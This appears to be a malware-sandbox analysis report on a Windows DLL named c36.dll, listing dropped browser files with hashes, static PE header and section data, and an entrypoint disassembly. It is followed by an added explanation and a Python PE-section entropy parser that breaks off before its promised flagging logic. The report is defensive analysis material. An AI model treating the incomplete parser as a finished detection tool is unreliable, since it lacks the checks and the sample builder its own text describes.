                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1070375" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6C6C1DA9-E104-11EB-90E4-ECF4BB862DED}.dat
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:Microsoft Word Document
                                    Category:dropped
                                    Size (bytes):29272
                                    Entropy (8bit):1.7675208968892673
                                    Encrypted:false
                                    SSDEEP:48:Iw30GcprZfGwpLjGhG/ap8OtGIpcUwGWGvnZpvUtGogqp9UEGo4hpmUCGWuOEGW+:r3oZZpZjk2OfWUwetUTfU/hMUNoJVB
                                    MD5:21006F3BE1A506E4B2D3A7D675C3EBDD
                                    SHA1:4B46C9F4156FBE672987AC7BA44D9E3B12D452AF
                                    SHA-256:2A15B6133068778BA036876E43A2519E38433920A31EFB23BAA08013BEA921D2
                                    SHA-512:643BE0C532B07CDF93D7791294D387ED353A34ED50A554C1840E32F350684DBB5A5D7C9DCEF9FD0F3D2A1CE95284A0B6A73EE87B2933E3E991778B0BDFADA358
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{6C6C1DAB-E104-11EB-90E4-ECF4BB862DED}.dat
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:Microsoft Word Document
                                    Category:dropped
                                    Size (bytes):27388
                                    Entropy (8bit):1.8492333825151834
                                    Encrypted:false
                                    SSDEEP:96:rpZeQ668BSOj12tWdMBOqQF/9PRqQF/9MpA:rpZeQ668kOj12tWdMBOqCFPRqCF0A
                                    MD5:FE9CCD814B0F8DDE2AB3DABF6420BE47
                                    SHA1:4A13D13C7681D3625C0A877A59D47CB2F4F3237D
                                    SHA-256:C6622CFBD0FC7E8D998683132E490EFC4B9DEDC4AEA47F90409C93C95E014B65
                                    SHA-512:286A8FE0ABB4D960C91A2628A664236A54FBD90FF60597FE68137E07471D2F212C59DB298B680C2CB752B5F57B2C689120B2C89E422001CB4754183316DAFD53
                                    Malicious:false
                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):656
                                    Entropy (8bit):5.1203165948199825
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxOE8AeZ7AeZAnWimI002EtM3MHdNMNxOE8AeZ7AeZAnWimI00ObVbkEty:2d6NxOplqSZHKd6NxOplqSZ76b
                                    MD5:8D599BEF9D241754D23ECCECFD30C7A6
                                    SHA1:51A406A8931432436C370EA1078E7BE3FA17889D
                                    SHA-256:2C23AA2A761171E479E8DA74AF011AEDA89AD4ABEE4FAEBF3DD0496EFA5AFE2D
                                    SHA-512:5B0A837124CE8EDFB3188256F3EE28A78577070A0176CFDE0FB5576D2922AB1340C392BBF7F07683F9108561B46D08579D806E067D7669723E8DC363676DBA38
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):653
                                    Entropy (8bit):5.134563004044832
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxe2k86Z76ZAnWimI002EtM3MHdNMNxe2k86Z76ZAnWimI00Obkak6EtMb:2d6NxrJIfSZHKd6NxrJIfSZ7Aa7b
                                    MD5:4968B66BBB4A88C515D2C48C5F7D86FE
                                    SHA1:9A7A7C9FCC6E181E0AC824DB06D7CE4504F7421C
                                    SHA-256:FE0A0417B43404C5378D17300F8DA55E8A75E852BBE027A5DC3F6D82C0E6ED64
                                    SHA-512:3EB1E1738241EA8A8D59906A5FBF17E7AA0588C065377687CA8D3FCB791418235D9FC44F3BD016D441AF009FA7FC2C58DC454111186F470A0368D323F88D0362
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x441e92db,0x01d77511</date><accdate>0x441e92db,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x441e92db,0x01d77511</date><accdate>0x441e92db,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):662
                                    Entropy (8bit):5.139226419193965
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxvL8AeZ7AeZAnWimI002EtM3MHdNMNxvL8AeZ7AeZAnWimI00ObmZEtMb:2d6NxvglqSZHKd6NxvglqSZ7mb
                                    MD5:E65305058781D1E10E76451B366CC50B
                                    SHA1:A4D4324D1D8A0807B3252A6CC897B2ADAB930F7E
                                    SHA-256:248168AC56792FD9991B18F14E4B5AE6117F9BE7AA56800E97BBD5CF7FCFA199
                                    SHA-512:D9B19329BE9172E086822E4FCA3B21F431C1BC201C992E75FC2DD73D61582628D0A3A38747DE74031E720A52B080F0D691CBEA6F474B76A77427556720CFD091
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):647
                                    Entropy (8bit):5.136436978120072
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxi8AeZ7AeZAnWimI002EtM3MHdNMNxi8AeZ7AeZAnWimI00Obd5EtMb:2d6Nx3lqSZHKd6Nx3lqSZ7Jjb
                                    MD5:C6E669BDEEEAB022234DE6E073CDF6EB
                                    SHA1:B511F8C524D80A8C2FDFE95BDA8F8D3E0D291F37
                                    SHA-256:F2CFC7DA7D96C261CEE7A5D4F2A9662543CA5293B05EDDDB9277CDCB077471CC
                                    SHA-512:7C108964C022559DB1014A2AADACEA1395FBA223B106F846EAFA16B1F1C0675F6B3C6A81B0B51A9DEEC416F8472E6E4AB835B1593953AA771CD4E565CCFAE818
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):656
                                    Entropy (8bit):5.151417094368856
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxhGw8AeZ7AeZAnWimI002EtM3MHdNMNxhGw8AeZ7AeZAnWimI00Ob8K0z:2d6NxQVlqSZHKd6NxQVlqSZ7YKajb
                                    MD5:BD0CE2FC38BCF545CAB4BE1835DC5E18
                                    SHA1:A664B1DB83548D55CA28B2EBB79451A2749107D8
                                    SHA-256:E1C0BED752BBC87034EA8863531BAB3922A3E6F8E08BF981200C17DDEAC8F2A1
                                    SHA-512:32BB1B156E95FAED8525354D0A145EE4BCFBA0E5DD6FAD8C7EEB6D1BC2BCA147B014C487105261FEB988526A0EE9A16F63F5AF2F7A972C0C8CF78A964F8CB2E1
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):653
                                    Entropy (8bit):5.123606740322444
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNx0n8AeZ7AeZAnWimI002EtM3MHdNMNx0n8AeZ7AeZAnWimI00ObxEtMb:2d6Nx08lqSZHKd6Nx08lqSZ7nb
                                    MD5:F3FAA80C08BA5526AB523C40946E247E
                                    SHA1:6A1E77975DB7D3AC5B0FBE42A3914BD443628F5C
                                    SHA-256:D449DCB79EC7D2030DFB93AF8BED6A3085BB42166B673476092D78309301A397
                                    SHA-512:70C9AFB28FDDED7E6F06C56A292AA936CA682F9817102E15EAA8CDEFD8BF472BF822EF8FD47FC1D484CB076D532220B18F39E91E8A0AC3064F0DDC60A9C3C1B7
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):656
                                    Entropy (8bit):5.160740296090679
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxx8AeZ7AeZAnWimI002EtM3MHdNMNxx8AeZ7AeZAnWimI00Ob6Kq5EtMb:2d6Nx2lqSZHKd6Nx2lqSZ7ob
                                    MD5:48714DF7C36784927086738C16F5C2A4
                                    SHA1:C324557392A9AF2D1AD017801F5FC5A957CC6F52
                                    SHA-256:C9E7147C35DE4F86CA8D51D49FB2F0814D1782BDD79247FDC593CD315C0DC771
                                    SHA-512:381DDB57101A933CFDC76B412D6DD4B51EE2FEDF06B865CC560A66CE53FB52B751B458A98A47FCBE46CB7FF2403C44B26508B4A5D9C0B8ABAAF00E48D80F498D
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):659
                                    Entropy (8bit):5.137318022838918
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxc8AeZ7AeZAnWimI002EtM3MHdNMNxc8AeZ7AeZAnWimI00ObVEtMb:2d6NxRlqSZHKd6NxRlqSZ7Db
                                    MD5:697674F7D0D805F23E186232B6424E05
                                    SHA1:DCA130BAD20BDAAF493075711E0FE57A9A3B3E66
                                    SHA-256:530058573C14408B947F9CD92DCE93C2AFC8277D87440BF8DDF364F3EB4C7A8A
                                    SHA-512:F04C1267D749CE5230A6C2CD42AADE9847650A33020CA2D7DE18F3D5E0FAC65BD796110DE93F958244D8010E8A955367FBA6878077EF46689E90976C1368724F
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):653
                                    Entropy (8bit):5.121867956514355
                                    Encrypted:false
                                    SSDEEP:12:TMHdNMNxfn8AeZ7AeZAnWimI002EtM3MHdNMNxfn8AeZ7AeZAnWimI00Obe5EtMb:2d6NxElqSZHKd6NxElqSZ7ijb
                                    MD5:9A27A88CF938E3C4E0CC0269958A1E58
                                    SHA1:4D9817EE61624324D4C4B12F44DADC56A0A4C22C
                                    SHA-256:1AF855867CF3E2A780A6A0446CF441CA6C38DFC5618E08F53A95BF3BDA43E5DC
                                    SHA-512:84FF9935B33C728DCDE14016A22DB8EABA513D26609A6D3BB865B5388DF4C463750A396A39AA996A17CB2F5ED3B60043C2926F5873E919A3E6B532A3004E8EB8
                                    Malicious:false
                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                    C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):89
                                    Entropy (8bit):4.45974266689267
                                    Encrypted:false
                                    SSDEEP:3:oVXUTXWQXIqAW8JOGXnETXWQXINCn:o9UbWQj9qEbWQx
                                    MD5:31F3A28E3C9E0448A4DE020E1CFCE108
                                    SHA1:7973A0BA483BCDC71D6B4019EED8E339FDD3A4A2
                                    SHA-256:B996A2D4F7C4BFE8D9768D73D98F5ADBF990DFD46F31592BC98456A97861E47B
                                    SHA-512:7382AF998560B796D3F4C852AAF037943DE1A7CF13B377A73931DA0318CEE03CA295F950BD7181F66402B667D96651D9B7DA61556C902D6768DD0D68259862D6
                                    Malicious:false
                                    Preview: [2021/07/09 15:24:32.452] Latest deploy version: ..[2021/07/09 15:24:32.452] 11.211.2 ..
                                    C:\Users\user\AppData\Local\Temp\~DF07D76F7116EA20F8.TMP
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):39673
                                    Entropy (8bit):0.5785657953581591
                                    Encrypted:false
                                    SSDEEP:96:kBqoxKAuvScS+djBgDtqQF/9DqQF/9LqQF/9Q:kBqoxKAuqR+djBgDtqCFDqCFLqCFQ
                                    MD5:43C08021A5463B6D50E11C9B0BAA362B
                                    SHA1:EDB06BDF34E9CB9AA26AE49B9C86E4CAE07C455D
                                    SHA-256:1E0EBF8E779D2B155A35E19C0E03DF9BD10B71AF760681FD2EF7B7423CF1F67C
                                    SHA-512:739BA552A407DF3BE4136C6180ADCC94474DEFCAAEAF689439B218C03F8E6FC00ABD733CA5B80160AC036E3B68D7EC62DA83B91B48FE6BE36119BF8A4565D0F0
                                    Malicious:false
                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    C:\Users\user\AppData\Local\Temp\~DFD1208600E5902E85.TMP
                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):12933
                                    Entropy (8bit):0.4077520377433156
                                    Encrypted:false
                                    SSDEEP:24:c9lLh9lLh9lIn9lIn9lofF9lo99lWBKZuZ5:kBqoIGY0C5
                                    MD5:CF36976683EF379314E18BCFA7B64F2B
                                    SHA1:63F70513C6EE4995434753552B1C08602CA2145E
                                    SHA-256:7194824FCFF90202061DE09AE7017A032227DAC4FA8EDD025BF60BD0B18CAB48
                                    SHA-512:6EE26E39E72414E447954280B7F418CAB1C9FAB75D7F2254EB5753FA3B4703CED4BFD2F254811B0B72F866800D021EC4C7A43C4CFD9A30CDB269ED402B8BF28A
                                    Malicious:false
                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.699066149824432
                                    TrID:
                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                    • DOS Executable Generic (2002/1) 0.20%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:c36.dll
                                    File size:421376
                                    MD5:c36ab737db2b6d11fb1f443f8117a7fa
                                    SHA1:e6fab2798dd6088aa3527a01ae1b3f2415cf40cf
                                    SHA256:181fe6714ebaff8c1855e8e1dbac545ffd160df0ec96ddf920c5155916b7111b
                                    SHA512:04884ebda245977509b16eddc89a057582f47cc315610ba040750313bdb668d5377fec118f9c6d7934c7369c3b40d09cb084ec22c71979316ed32860538b0fa9
                                    SSDEEP:6144:XoiHyepaXa+Cv3FyUtySzhyq++rWM+AVF7tct2PytUDlrfu+U39O:YfGFvFu8hPwM+AVLcMKtKtK
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./"j.kC..kC..kC..u...sC..u....C..b;..lC..kC...C..u...RC..u...jC..u...jC..u...jC..RichkC..................PE..L.....+L...........

                                    File Icon

                                    Icon Hash:74f0e4ecccdce0e4

                                    Static PE Info

                                    General

                                    Entrypoint:0x1036ead
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x1000000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                    DLL Characteristics:DYNAMIC_BASE
                                    Time Stamp:0x4C2B8293 [Wed Jun 30 17:44:51 2010 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:9ac2df5a14a0377b217ae274fd22ed43

                                    Entrypoint Preview

                                    Instruction
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    cmp dword ptr [ebp+0Ch], 01h
                                    jne 00007FF678D92B27h
                                    call 00007FF678D9E142h
                                    push dword ptr [ebp+08h]
                                    mov ecx, dword ptr [ebp+10h]
                                    mov edx, dword ptr [ebp+0Ch]
                                    call 00007FF678D92A11h
                                    pop ecx
                                    pop ebp
                                    retn 000Ch
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000328h
                                    mov eax, dword ptr [01062480h]
                                    xor eax, ebp
                                    mov dword ptr [ebp-04h], eax
                                    test byte ptr [01062500h], 00000001h
                                    push esi
                                    je 00007FF678D92B2Ah
                                    push 0000000Ah
                                    call 00007FF678D98B9Ah
                                    pop ecx
                                    call 00007FF678D9E1EEh
                                    test eax, eax
                                    je 00007FF678D92B2Ah
                                    push 00000016h
                                    call 00007FF678D9E1F0h
                                    pop ecx
                                    test byte ptr [01062500h], 00000002h
                                    je 00007FF678D92BF0h
                                    mov dword ptr [ebp-00000220h], eax
                                    mov dword ptr [ebp-00000224h], ecx
                                    mov dword ptr [ebp-00000228h], edx
                                    mov dword ptr [ebp-0000022Ch], ebx
                                    mov dword ptr [ebp-00000230h], esi
                                    mov dword ptr [ebp-00000234h], edi
                                    mov word ptr [ebp-00000208h], ss
                                    mov word ptr [ebp-00000214h], cs
                                    mov word ptr [ebp-00000238h], ds
                                    mov word ptr [ebp-0000023Ch], es
                                    mov word ptr [ebp-00000240h], fs
                                    mov word ptr [ebp-00000244h], gs
                                    pushfd
                                    pop dword ptr [ebp-00000210h]
                                    mov esi, dword ptr [ebp+04h]
                                    lea eax, dword ptr [ebp+04h]
                                    mov dword ptr [ebp+00FFFDF4h], eax

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 build 21022
                                    • [ASM] VS2008 build 21022
                                    • [LNK] VS2008 build 21022
                                    • [RES] VS2008 build 21022
                                    • [EXP] VS2008 build 21022
                                    • [IMP] VS2008 SP1 build 30729
                                    • [C++] VS2008 build 21022

                                    Data Directories

                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x619e0 | 0x85 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61014 | 0x50 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfc000 | 0xd80 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfd000 | 0x2768 | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x4b220 | 0x1c | .rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5f700 | 0x40 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x4b000 | 0x1ac | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                    Sections

                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x49dbd | 0x49e00 | False | 0.661458333333 | data | 6.64292711487 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x4b000 | 0x16a65 | 0x16c00 | False | 0.650519402473 | data | 6.09504929451 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0x62000 | 0x998c8 | 0x1800 | False | 0.343587239583 | data | 3.99466653624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .rsrc | 0xfc000 | 0xd80 | 0xe00 | False | 0.364397321429 | data | 3.40694082872 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0xfd000 | 0x3928 | 0x3a00 | False | 0.554485452586 | data | 5.40101717847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
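                                    The section table above is the part of the static report a triager reads first: the per-section entropy column, and a .data section whose virtual size (0x998c8) is far larger than its raw size (0x1800), i.e. memory the loader reserves but the file does not fill, which is where an in-process unpacker typically writes its decoded payload. The following is an added example, not part of the sandbox report and not code from the sandbox vendor: a standard-library-only Python parser that walks the DOS header, PE signature, COFF header and section table, computes the same 8-bit Shannon entropy the report's Entropy column shows, and flags the two conditions just described. The thresholds (7.0 bits, 8x growth) are this example's own choice, and the PE image it parses is constructed in build_sample_pe(), not c36.dll.

```python
import math
import struct

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table (40-byte entries)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsect, _ts, _symptr, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(nsect):
        (name, vsize, va, raw_size, raw_ptr,
         _reloc, _lines, _nreloc, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "raw_size": raw_size,
            "chars": chars, "entropy": shannon_entropy(raw),
        })
    return sections


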